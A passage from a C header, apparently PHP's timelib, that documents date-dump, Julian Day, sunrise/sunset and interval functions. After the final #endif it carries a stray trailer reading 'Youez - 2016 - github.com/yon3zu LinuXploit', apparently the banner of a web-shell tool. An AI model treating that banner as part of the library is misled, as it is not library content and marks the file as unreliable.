 *
 * 'options' is a bit field, where:
 * - 1 controls whether the relative time portion is shown.
 * - 2 controls whether the zone type is shown.
 */
void timelib_dump_date(timelib_time *d, int options);

/**
 * Displays debugging information about the relative time information stored
 * in 'd'.
 */
void timelib_dump_rel_time(timelib_rel_time *d);

/**
 * Converts a decimal hour into hour/min/sec components
 */
void timelib_decimal_hour_to_hms(double h, int *hour, int *min, int *sec);

/**
 * Converts hour/min/sec values into a decimal hour
 */
void timelib_hms_to_decimal_hour(int hour, int min, int sec, double *h);

/* from astro.c */

/**
 * Converts the Unix Epoch time stamp 'ts' to a Julian Day
 *
 * The value returned is the number of whole days since -4714-11-24T12:00:00 UTC
 * (in the proleptic Gregorian calendar):
 * https://en.wikipedia.org/wiki/Julian_day
 */
double timelib_ts_to_julianday(timelib_sll ts);

/**
 * Converts the Unix Epoch time stamp 'ts' to the J2000 epoch
 *
 * The value returned is the number of whole days since 2000-01-01T12:00:00
 * UTC: https://en.wikipedia.org/wiki/Epoch_(astronomy)#Julian_years_and_J2000
 */
double timelib_ts_to_j2000(timelib_sll ts);

/**
 * Calculates when the Sun is above a certain latitude.
 *
 * Parameters:
 * - time: A timelib_time time describing that needs to specific midnight for a
 *         specific day.
 * - lon: The longitude of the observer (East positive, West negative).
 * - lat: The latitude of the observer (North positive, South negative).
 * - altit: The altitude. Set to -35/60 for rise/set, -6 for civil twilight,
 *          -12 for nautical, and -18 for astronomical twilight.
 * - upper_limb: set to non-zero for rise/set calculations, and 0 for twilight
 *               calculations.
 *
 * Out Parameters:
 * - h_rise: The decimal hour when the Sun rises
 * - h_set: The decimal hour when the Sun sets
 * - ts_rise: The Unix timestamp of the Sun rising
 * - ts_set: The Unix timestamp of the Sun setting
 * - ts_transit: The Unix timestmap of the Sun transitting through South
 *
 * Return Values:
 * - 0: The Sun rises and sets.
 * - +1: The Sun is always above the horizon. (ts_rise is set to ts_transit -
 *       (12 * 3600); ts_set is set to ts_transit + (12 * 3600).
 * - -1: The Sun is awlays below the horizon. (ts_rise and ts_set are set
 *       to ts_transit)
 */
int timelib_astro_rise_set_altitude(timelib_time *time, double lon, double lat, double altit, int upper_limb, double *h_rise, double *h_set, timelib_sll *ts_rise, timelib_sll *ts_set, timelib_sll *ts_transit);

/* from interval.c */

/**
 * Calculates the difference between two times
 *
 * The result is a timelib_rel_time structure that describes how you can
 * convert from 'one' to 'two' with 'timelib_add'. This does *not* necessarily
 * mean that you can go from 'two' to 'one' by using 'timelib_sub' due to the
 * way months and days are calculated.
 */
timelib_rel_time *timelib_diff(timelib_time *one, timelib_time *two);

/**
 * Adds the relative time information 'interval' to the base time 't'.
 *
 * This can be a relative time as created by 'timelib_diff', but also by more
 * complex statements such as "next workday".
 */
timelib_time *timelib_add(timelib_time *t, timelib_rel_time *interval);

/**
 * Subtracts the relative time information 'interval' to the base time 't'.
 *
 * This can be a relative time as created by 'timelib_diff'. Unlike with
 * 'timelib_add', this does not support more complex statements such as "next
 * workday".
 */
timelib_time *timelib_sub(timelib_time *t, timelib_rel_time *interval);

#ifdef __cplusplus
} /* extern "C" */
#endif

#endif

Youez - 2016 - github.com/yon3zu
LinuXploit